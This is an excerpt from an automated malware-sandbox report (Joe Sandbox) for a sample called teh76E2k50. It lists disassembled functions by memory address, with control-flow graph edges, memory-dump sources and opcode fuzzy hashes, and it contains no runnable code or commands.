                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: f7eb237b841facb7ea18cfdfa57903d9f1af2baa9e489d15995a5eddad15d0d7
                                                          • Instruction ID: d350be30c6297065bdb7380fa5d38a619143bbd186f41aaf10aa20107f44bedb
                                                          • Opcode Fuzzy Hash: f7eb237b841facb7ea18cfdfa57903d9f1af2baa9e489d15995a5eddad15d0d7
                                                          • Instruction Fuzzy Hash: F7514670D0D68A9FDB59EFA8C4556BDBBB1FF44350F5140BAC00AE7292CA386905CB40
                                                          Function 00007FF848BFECD9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 214 7ff848bfecd9-7ff848bfece5 215 7ff848bfece7-7ff848bfecef 214->215 216 7ff848bfecf0-7ff848bfedc2 CloseHandle 214->216 215->216 220 7ff848bfedc4 216->220 221 7ff848bfedca-7ff848bfee1e 216->221 220->221
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: ef96afd458043f25dccb674cbca6b101d0f2416430537f4e1b5b4c5140e81fd1
                                                          • Instruction ID: 2840bd2b447f52491a8de417b075401e7a892b8a7eaa5358c66ae614711cc6f7
                                                          • Opcode Fuzzy Hash: ef96afd458043f25dccb674cbca6b101d0f2416430537f4e1b5b4c5140e81fd1
                                                          • Instruction Fuzzy Hash: 2E416D30D0865C8FDB58DFA8D885BEDBBF0EF56310F1041AAD449EB292CB349885CB11
                                                          Function 00007FF84915C20C Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0S#I
                                                          • API String ID: 0-238827777
                                                          • Opcode ID: 41738cd27e3539208eaef1505bb7394e38b333945445919abd9454a580abaf01
                                                          • Instruction ID: e60fe4415ddfc6fbd8fa5b8484711ea2a0b22a5fe10f401b9f045ac7f192b488
                                                          • Opcode Fuzzy Hash: 41738cd27e3539208eaef1505bb7394e38b333945445919abd9454a580abaf01
                                                          • Instruction Fuzzy Hash: BB41F43194E3C94FE753AB34E8055F97FA0EB83374F0901FAD089CA0A3D6A95516CB52
                                                          Function 00007FF8491535F8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 246 7ff8491535f8-7ff849153610 248 7ff849153618-7ff849153643 246->248 252 7ff84915366c-7ff849153672 248->252 253 7ff849153679-7ff84915367f 252->253 254 7ff849153645-7ff84915365e 253->254 255 7ff849153681-7ff849153686 253->255 256 7ff849153664-7ff849153669 254->256 257 7ff849153755-7ff849153765 254->257 258 7ff84915368c-7ff8491536c1 255->258 259 7ff849153573-7ff8491535b8 255->259 256->252 267 7ff849153768-7ff849153777 257->267 268 7ff849153767 257->268 259->253 262 7ff8491535be-7ff8491535c4 259->262 264 7ff849153575-7ff84915374d 262->264 265 7ff8491535c6 262->265 264->257 270 7ff8491535ef-7ff8491535f6 265->270 268->267 270->246 271 7ff8491535c8-7ff8491535e1 270->271 271->257 273 7ff8491535e7-7ff8491535ec 271->273 273->270
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 17b7b954772f49ef2c62ec4fa3b9d27e7f53ce0f22fffca2edbf07ee0288dd7b
                                                          • Instruction ID: d567f0ad802dff9b2904b501b77597a8ba8b59d4039e57621db1129df3cb0386
                                                          • Opcode Fuzzy Hash: 17b7b954772f49ef2c62ec4fa3b9d27e7f53ce0f22fffca2edbf07ee0288dd7b
                                                          • Instruction Fuzzy Hash: 28412370D1C64ADFEB5AEFA8C4545BDBBB1FF08350F9140B9C00AA7282CA396942CF50
                                                          Function 00007FF84915C24A Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0S#I
                                                          • API String ID: 0-238827777
                                                          • Opcode ID: 138baa4ec7ff16fcd9a09827c372a097ad4daf3745da4b2e905c8789547a1e77
                                                          • Instruction ID: fd548811f3aef506c52b0f5c02802c8578c2d209df5dff38b4dd03ec699976dc
                                                          • Opcode Fuzzy Hash: 138baa4ec7ff16fcd9a09827c372a097ad4daf3745da4b2e905c8789547a1e77
                                                          • Instruction Fuzzy Hash: 8C31F82094F3C98FE753AB34A8585E97FA1AF43374F1900FAD085CE4A3C69D0515CB52
                                                          Function 00007FF84915BAB0 Relevance: .7, Instructions: 681COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 422 7ff84915bab0-7ff84915baca 423 7ff84915c0cc-7ff84915c0da 422->423 424 7ff84915bad0-7ff84915bae0 422->424 428 7ff84915c0dc 423->428 429 7ff84915c0e1-7ff84915c0f0 423->429 425 7ff84915c12a-7ff84915c140 424->425 426 7ff84915bae6-7ff84915bb21 424->426 433 7ff84915c18a-7ff84915c19d 425->433 434 7ff84915c142-7ff84915c166 425->434 432 7ff84915bbba-7ff84915bbc2 426->432 428->429 435 7ff84915bbc8 432->435 436 7ff84915bb26-7ff84915bb2f 432->436 437 7ff84915bbd2-7ff84915bbef 435->437 436->425 438 7ff84915bb35-7ff84915bb40 436->438 441 7ff84915bbf6-7ff84915bc07 437->441 439 7ff84915bbca-7ff84915bbce 438->439 440 7ff84915bb46-7ff84915bb5a 438->440 439->437 442 7ff84915bb5c-7ff84915bb73 440->442 443 7ff84915bbb3-7ff84915bbb7 440->443 449 7ff84915bc09-7ff84915bc1e 441->449 450 7ff84915bc20-7ff84915bc2f 441->450 442->425 444 7ff84915bb79-7ff84915bb85 442->444 443->432 445 7ff84915bb9f-7ff84915bbb0 444->445 446 7ff84915bb87-7ff84915bb9b 444->446 445->443 446->442 448 7ff84915bb9d 446->448 448->443 449->450 454 7ff84915bc51-7ff84915bcbe 450->454 455 7ff84915bc31-7ff84915bc4c 450->455 463 7ff84915bd0f-7ff84915bd56 454->463 464 7ff84915bcc0-7ff84915bcd3 454->464 461 7ff84915c089-7ff84915c0a9 455->461 468 7ff84915c0ad-7ff84915c0ba 461->468 474 7ff84915bd5a-7ff84915bd7b 463->474 464->425 466 7ff84915bcd9-7ff84915bd07 464->466 475 7ff84915bd08-7ff84915bd0d 466->475 470 7ff84915c0bc-7ff84915c0c6 468->470 470->424 472 7ff84915c0cb 470->472 472->423 478 7ff84915bd7d-7ff84915bd81 474->478 479 7ff84915bdec-7ff84915bdfd 474->479 475->464 476 7ff84915bd0e 475->476 476->463 478->475 482 7ff84915bd83 478->482 481 7ff84915bdfe-7ff84915be01 479->481 484 7ff84915be07-7ff84915be0b 481->484 483 7ff84915bdac-7ff84915bdbd 482->483 483->484 491 7ff84915bdbf-7ff84915bdcd 483->491 485 7ff84915be0d-7ff84915be0f 484->485 487 7ff84915be59-7ff84915be61 485->487 488 7ff84915be11-7ff84915be1f 485->488 492 7ff84915beab-7ff84915beb3 487->492 493 7ff84915be63-7ff84915be6c 487->493 489 7ff84915be21-7ff84915be25 488->489 490 7ff84915be90-7ff84915bea5 488->490 489->483 500 7ff84915be27 489->500 490->492 497 7ff84915bdcf-7ff84915bdd3 491->497 498 7ff84915be3e-7ff84915be53 491->498 495 7ff84915beb9-7ff84915bed2 492->495 496 7ff84915bf3b-7ff84915bf49 492->496 499 7ff84915be6f-7ff84915be71 493->499 495->496 501 7ff84915bed4-7ff84915bed5 495->501 502 7ff84915bf4b-7ff84915bf4d 496->502 503 7ff84915bfba-7ff84915bfbb 496->503 497->474 512 7ff84915bdd5 497->512 498->487 505 7ff84915be73-7ff84915be75 499->505 506 7ff84915bee2-7ff84915bee4 499->506 500->498 508 7ff84915bed6-7ff84915bee0 501->508 509 7ff84915bf4f 502->509 510 7ff84915bfc9-7ff84915bfcb 502->510 507 7ff84915bfeb-7ff84915bfed 503->507 513 7ff84915be77 505->513 514 7ff84915bef1-7ff84915bef5 505->514 518 7ff84915bee5-7ff84915bee7 506->518 520 7ff84915bfef 507->520 521 7ff84915c05e-7ff84915c087 507->521 508->506 509->508 517 7ff84915bf51 509->517 515 7ff84915bfcd-7ff84915bfcf 510->515 516 7ff84915c03c 510->516 512->479 513->481 519 7ff84915be79 513->519 522 7ff84915bef7 514->522 523 7ff84915bf71-7ff84915bf8b 514->523 525 7ff84915c04b-7ff84915c04f 515->525 526 7ff84915bfd1 515->526 516->468 524 7ff84915c03e-7ff84915c040 516->524 527 7ff84915bf58-7ff84915bf5c 517->527 537 7ff84915bf68-7ff84915bf70 518->537 538 7ff84915bee8 518->538 529 7ff84915be7e-7ff84915be84 519->529 530 7ff84915c00c-7ff84915c01a 520->530 521->461 522->529 531 7ff84915bef9 522->531 550 7ff84915bfbd-7ff84915bfc6 523->550 551 7ff84915bf8d-7ff84915bf9b 523->551 524->470 532 7ff84915c042 524->532 525->472 534 7ff84915c051 525->534 526->527 533 7ff84915bfd3 526->533 535 7ff84915bf5e 527->535 536 7ff84915bfd8-7ff84915bfde 527->536 543 7ff84915bf00-7ff84915bf25 529->543 549 7ff84915be86 529->549 542 7ff84915c01b-7ff84915c025 530->542 531->543 532->510 544 7ff84915c044 532->544 533->536 534->536 545 7ff84915c053 534->545 535->518 546 7ff84915bf60 535->546 554 7ff84915c05a-7ff84915c05d 536->554 555 7ff84915bfe0 536->555 537->523 538->499 548 7ff84915bee9-7ff84915beea 538->548 552 7ff84915c027-7ff84915c03a 542->552 560 7ff84915bf28-7ff84915bf39 543->560 544->525 545->554 546->537 548->514 549->485 556 7ff84915be88 549->556 550->510 551->530 558 7ff84915bf9d-7ff84915bf9f 551->558 552->516 554->521 555->552 561 7ff84915bfe2-7ff84915bfea 555->561 556->490 558->542 562 7ff84915bfa1 558->562 560->496 560->501 561->507 562->560 563 7ff84915bfa3 562->563 563->503
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5878c0637fe6d19abd2b07f826865c5bbd221a6a8066fbd1a732ab74341edf6a
                                                          • Instruction ID: d6505e05a17d5d651c8293e47cba0008e18658ad5d815541ff509c7481c8a543
                                                          • Opcode Fuzzy Hash: 5878c0637fe6d19abd2b07f826865c5bbd221a6a8066fbd1a732ab74341edf6a
                                                          • Instruction Fuzzy Hash: 79227334A1CA5DCFDBA8EF18C895A79B3E2FF54351B5541B9D00EC7292DA28AC45CF80
                                                          Function 00007FF84916174E Relevance: .6, Instructions: 629COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3546d12ddd94bf4fe053870f2c801b8e04f29c8811f976e94ebfa7ebd69cf408
                                                          • Instruction ID: e8d2615071285b478a4071d715bf69d2dcb9537fc3303338c3a14a34c82fcd60
                                                          • Opcode Fuzzy Hash: 3546d12ddd94bf4fe053870f2c801b8e04f29c8811f976e94ebfa7ebd69cf408
                                                          • Instruction Fuzzy Hash: D222B572D0E6D65FE712FF78A8A54F97FA0EF13398B0801FBD0888A093E91969458745
                                                          Function 00007FF8491548B1 Relevance: .4, Instructions: 415COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 693 7ff8491548b1 694 7ff8491548b6-7ff8491548be 693->694 695 7ff8491548c4-7ff8491548d6 call 7ff849154280 694->695 696 7ff849154a41-7ff849154a55 694->696 701 7ff8491548d8-7ff8491548dd 695->701 702 7ff8491548a5-7ff8491548ac 695->702 698 7ff849154a5c-7ff849154a67 696->698 699 7ff849154a57 696->699 699->698 703 7ff8491548ff-7ff849154910 701->703 704 7ff8491548df-7ff8491548e3 701->704 705 7ff849154a80-7ff849154a85 702->705 708 7ff849154a8a-7ff849154aa5 703->708 709 7ff849154916-7ff84915492b 703->709 706 7ff8491548e9-7ff8491548fa 704->706 707 7ff8491549e3-7ff8491549f4 704->707 705->693 706->696 711 7ff8491549fb-7ff849154a06 707->711 712 7ff8491549f6 707->712 716 7ff849154aad 708->716 717 7ff849154aa7 708->717 709->708 710 7ff849154931-7ff84915493d 709->710 714 7ff84915496e-7ff849154984 call 7ff849154280 710->714 715 7ff84915493f-7ff849154956 call 7ff849152d90 710->715 712->711 714->707 724 7ff849154986-7ff849154991 714->724 715->707 726 7ff84915495c-7ff84915496b call 7ff849152ec0 715->726 721 7ff849154aaf 716->721 722 7ff849154ab1-7ff849154b13 716->722 717->716 721->722 740 7ff849154b1e-7ff849154b3c 722->740 741 7ff849154adb-7ff849154b17 722->741 724->708 727 7ff849154997-7ff8491549ac 724->727 726->714 727->708 730 7ff8491549b2-7ff8491549c5 727->730 733 7ff849154a19-7ff849154a21 730->733 734 7ff8491549c7-7ff8491549e1 call 7ff849152d90 730->734 738 7ff849154a29-7ff849154a2c 733->738 734->707 745 7ff849154a07-7ff849154a16 call 7ff849152ec0 734->745 743 7ff849154a33-7ff849154a3b 738->743 755 7ff849154b3e-7ff849154b70 741->755 756 7ff849154af5-7ff849154b10 741->756 743->696 746 7ff84915487a-7ff849154887 743->746 745->733 746->743 749 7ff84915488d-7ff8491548a1 746->749 749->743 759 7ff849154c58-7ff849154c5d 755->759 763 7ff849154b8c-7ff849154c67 759->763 764 7ff849154c71-7ff849154c8f 759->764 772 7ff849154c3d-7ff849154c55 763->772 773 7ff849154bb6-7ff849154bb9 763->773 772->759 773->772 775 7ff849154bbf-7ff849154bc2 773->775 776 7ff849154c2b-7ff849154c32 775->776 777 7ff849154bc4-7ff849154bf1 775->777 778 7ff849154c34-7ff849154c3c 776->778 779 7ff849154bf2-7ff849154c0c 776->779 781 7ff849154c91-7ff849154ce1 call 7ff8491514d0 779->781 782 7ff849154c12-7ff849154c1d 779->782 782->781 783 7ff849154c1f-7ff849154c29 782->783 783->776
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95689a1c728b5065ed02ee9be7f2a7a8a7d135d0958298c10a11fb9c7bc23932
                                                          • Instruction ID: 5ef5712217cb728cd5793c2f32a6af3254ec4632552c67bbd878fc9c4955e1bc
                                                          • Opcode Fuzzy Hash: 95689a1c728b5065ed02ee9be7f2a7a8a7d135d0958298c10a11fb9c7bc23932
                                                          • Instruction Fuzzy Hash: 5DE1E130A0DB968FE379EF28D491175B7E1FF443A0B15497EC49A836C6DA3DB8428B41
                                                          Function 00007FF84915F86F Relevance: .4, Instructions: 370COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd6cc87f65378f477a9a51b65bac3cc839e66ada45e7b021ed7d623f32f64615
                                                          • Instruction ID: 150b966b3410e64dfd6da3b1343f01b15501ea92f507123fe2adb9ccb7ae9d64
                                                          • Opcode Fuzzy Hash: dd6cc87f65378f477a9a51b65bac3cc839e66ada45e7b021ed7d623f32f64615
                                                          • Instruction Fuzzy Hash: FCD1D13051C5868FEB69DF18C4E06B17BA1FF45320B5545BDC85A8B68BC63CF881CB81
                                                          Function 00007FF84915F88F Relevance: .3, Instructions: 337COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67e72896c446967db151e56a2dd0983958c4338625d9a364000c57f4fc958050
                                                          • Instruction ID: 8cdd90747e5de7a4e89f3c37d3754c1a3e89d7294c04d92c5d780f47a67ddc00
                                                          • Opcode Fuzzy Hash: 67e72896c446967db151e56a2dd0983958c4338625d9a364000c57f4fc958050
                                                          • Instruction Fuzzy Hash: F0C1D23055D5868FEB2DDF18C4E06B17BA1FF45360B5545BDC89A8B68BCA3CE881CB41
                                                          Function 00007FF84915C8D7 Relevance: .3, Instructions: 330COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b502e1154b47b748978696bf7810176f4f2e030d68e6caef555c07443c4d64f
                                                          • Instruction ID: dd3826200729d52d149ec11799f17f4439053fbce3b9eef06229422057f80d55
                                                          • Opcode Fuzzy Hash: 9b502e1154b47b748978696bf7810176f4f2e030d68e6caef555c07443c4d64f
                                                          • Instruction Fuzzy Hash: 85319A31E0C5DA8EE6B4BE68A4511B8B7E0EF553E4F1541BAC00EC60C2CE2D68009B85
                                                          Function 00007FF84915388F Relevance: .3, Instructions: 327COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30cc02662f57beeac68c7b85a4a466a0dca48fb9e242c9e643bb95413c128830
                                                          • Instruction ID: 3ec0d9da2f8049b45d4a6158c5709f1c1962ab63374c4da6b153de075e56925d
                                                          • Opcode Fuzzy Hash: 30cc02662f57beeac68c7b85a4a466a0dca48fb9e242c9e643bb95413c128830
                                                          • Instruction Fuzzy Hash: 86C1BF3051C696CFEB2DDF18C0A01B5B7A1FF45360B9545BDD89A8B68BCA3CE482CB51
                                                          Function 00007FF84915C4E6 Relevance: .3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0361faedeeaf886d7c0a6b59c3623aa8c621fb00c7b9b15319af7842d3f47b09
                                                          • Instruction ID: f732ecfafd5723758a64dbdafa65acb7a90f9f4c1386ca9109266e088c6352a1
                                                          • Opcode Fuzzy Hash: 0361faedeeaf886d7c0a6b59c3623aa8c621fb00c7b9b15319af7842d3f47b09
                                                          • Instruction Fuzzy Hash: E8A1267590C8CA8FE778FF18C8555B5B7D0FF68360B5602B9D05EC36A2DE1CA9068B81
                                                          Function 00007FF84915F17A Relevance: .3, Instructions: 286COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25a16650a7b5b47d91cb574eadf3760ab4a6fed8542a98fc59b82b926ade601c
                                                          • Instruction ID: 3b2deb2c81ea63c39e09f6b90d7cb04522a60e44302645ca1099cd192efed19d
                                                          • Opcode Fuzzy Hash: 25a16650a7b5b47d91cb574eadf3760ab4a6fed8542a98fc59b82b926ade601c
                                                          • Instruction Fuzzy Hash: 72A1D430A0CA869FE75AEF28D0906A4FBA1FF45360F5541B9C44EC7786CB2CB851CB91
                                                          Function 00007FF84915023F Relevance: .3, Instructions: 285COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b87bbf8f97fd35ae59e092d98ef80b9395d24d666b09c0e4271bf4b3d8843fb5
                                                          • Instruction ID: 3076f3da3286758933d7b9fee22454b6e58cc90d73c6d9eecd5d787da9b8665f
                                                          • Opcode Fuzzy Hash: b87bbf8f97fd35ae59e092d98ef80b9395d24d666b09c0e4271bf4b3d8843fb5
                                                          • Instruction Fuzzy Hash: 0F91A67280E6D69FD721FFA8D8954F9BBA0EF023A8F0801BBD04D8A193DD1D6545CB54
                                                          Function 00007FF84915317A Relevance: .3, Instructions: 284COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190d4ef8cd08c1877606a13a419c485976dd7d85dfc9cbb34e9ba81825ca09cf
                                                          • Instruction ID: ac7886420d414e5cc4112c324c535329c632273a63123f4f3ae3340467078a41
                                                          • Opcode Fuzzy Hash: 190d4ef8cd08c1877606a13a419c485976dd7d85dfc9cbb34e9ba81825ca09cf
                                                          • Instruction Fuzzy Hash: 94A1C630A0CA86DFE75AEF28C0915A4F7A1FF55360F9541B9C44EC7686CB2CB852CB91
                                                          Function 00007FF849152656 Relevance: .3, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80a6c15020afbea106f049200ba79ebd5d70471dd5f06c2eacfd270df562a8b0
                                                          • Instruction ID: 463d45aa942462bc9c0c1d489914bf8539c57993bd7a35eb64402001d076c17e
                                                          • Opcode Fuzzy Hash: 80a6c15020afbea106f049200ba79ebd5d70471dd5f06c2eacfd270df562a8b0
                                                          • Instruction Fuzzy Hash: 02815A3290CB828FE379AF689445575B7E0EF553A0F56087ED48FC3192DE2CB8428B52
                                                          Function 00007FF84915E666 Relevance: .3, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63c140a429a3dd5d75dbd50be041c024ee85ae02f05f2a5056ee15e09d20fa2b
                                                          • Instruction ID: 9a3b387341963217d51eb5e4277b52cd780e35aa1280d3b4a98d09eb4dad8da5
                                                          • Opcode Fuzzy Hash: 63c140a429a3dd5d75dbd50be041c024ee85ae02f05f2a5056ee15e09d20fa2b
                                                          • Instruction Fuzzy Hash: FA81F731D0D6869FE739AF28A48D175BBE1EF453A0F16057ED48EC7192DE2CB8028B51
                                                          Function 00007FF849150799 Relevance: .2, Instructions: 244COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7483b581198b6289d269a71810baee9559f84b740faa57e9fa74610e20af7ef
                                                          • Instruction ID: 79091afd0e5d440e4f8e2f316a4eacd50627af88636538d289e6c4ecc28eeee8
                                                          • Opcode Fuzzy Hash: c7483b581198b6289d269a71810baee9559f84b740faa57e9fa74610e20af7ef
                                                          • Instruction Fuzzy Hash: 35712635D0E9898FE778FE5888169B4B7D0FF84370B1602B9D49EC7592DE1CA8068BC1
                                                          Function 00007FF84915135B Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfff0e18c8d68531849c58a277dc4d86aaba9787b0ea69186d38dd5d73ad8033
                                                          • Instruction ID: 0cce6997ac24b2b9c9222a1211a3818526e68594a99b3222212c2dd4c7a23652
                                                          • Opcode Fuzzy Hash: bfff0e18c8d68531849c58a277dc4d86aaba9787b0ea69186d38dd5d73ad8033
                                                          • Instruction Fuzzy Hash: 80719130D1C68A9FEBA6EF648454ABCBBB1FF453A4F5104B9D00ED7182DA3CA841CB10
                                                          Function 00007FF849153C00 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e89deac42e70bfc6c0285e4c9df90c6cd2ee4956d44598dd1c030d2dbf227a65
                                                          • Instruction ID: 4932b1e4abf67b9fddcf797008f716a56939f719a65f8c0396cc72fd8275a492
                                                          • Opcode Fuzzy Hash: e89deac42e70bfc6c0285e4c9df90c6cd2ee4956d44598dd1c030d2dbf227a65
                                                          • Instruction Fuzzy Hash: A751F630D1C59ACEEB7CAF2844652F8B7A2FF54350F9541BAC05EC7286CE2C69859F41
                                                          Function 00007FF848A5090D Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
